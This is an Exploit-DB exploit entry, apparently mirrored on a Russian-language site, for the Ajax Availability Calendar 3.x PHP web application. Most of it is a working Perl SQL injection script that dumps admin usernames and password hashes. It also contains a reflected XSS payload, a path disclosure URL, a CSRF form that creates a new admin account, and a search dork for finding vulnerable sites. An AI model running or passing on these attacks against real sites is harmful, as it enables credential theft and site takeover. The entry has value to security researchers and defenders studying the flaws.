- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25409
- Проверка EDB
-
- Пройдено
- Автор
- ATT4CKXT3RR0R1ST
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2013-05-13
Код:
Ajax Availability Calendar 3.X.X Multiple Vulnerabilties
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://www.ajaxavailabilitycalendar.com/
.:. Dork : intitle:"Ajax Availability Calendar" , inurl:"/ac-admin/index.php"
####################################################################
===[ Exploit ]===
Sql Injection:
==============
#!/usr/bin/perl -w
# Ajax Availability Calendar 3.X.X Remote SQL Injection Vulnerability
# Author : AtT4CKxT3rR0r1ST
# Contact : [email protected]
# Script : http://www.ajaxavailabilitycalendar.com/
# Admin Panel : www.site.com/ac-admin/
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|----------------------------------------------------|\n";
print "| 'Ajax Availability Calendar 3.X.X' |\n";
print "| Coded by : AtT4CKxT3rR0r1ST |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
#Nama Column
$Column="group_concat(username,0x3a,password)";
#Nama Table
$table="bookings_admin_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "?id_item=null and 1=2 union select ".$Column."+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/:(.*):([0-9a-fA-F]{32})/){
print "\n[+] Admin User : $1\n";
}if($answer =~/([0-9a-fA-F]{32})/){
print "\n[+] Admin Hash : $1\n";
print "[+] Success !!\n";
}
else{print "[-] Unable To Get The Information...\n";
}
Reflected XSS:
==============
www.site.com/?id_item='"--></style></script><script>alert(0x000581)</script>
Full Path Disclosure:
====================
www.site.com/ac-includes/common.inc.php
CSRF:
=====
[Add Admin]
-------------
<form method="POST" name="form0" action="http://www.site.com/ac-admin/index.php?page=admin_users&action=new">
<input type="hidden" name="add[username]" value="admin"/>
<input type="hidden" name="password" value="Palestine"/>
<input type="hidden" name="password2" value="Palestine"/>
</form>
</body>
</html>
####################################################################
- Источник
- www.exploit-db.com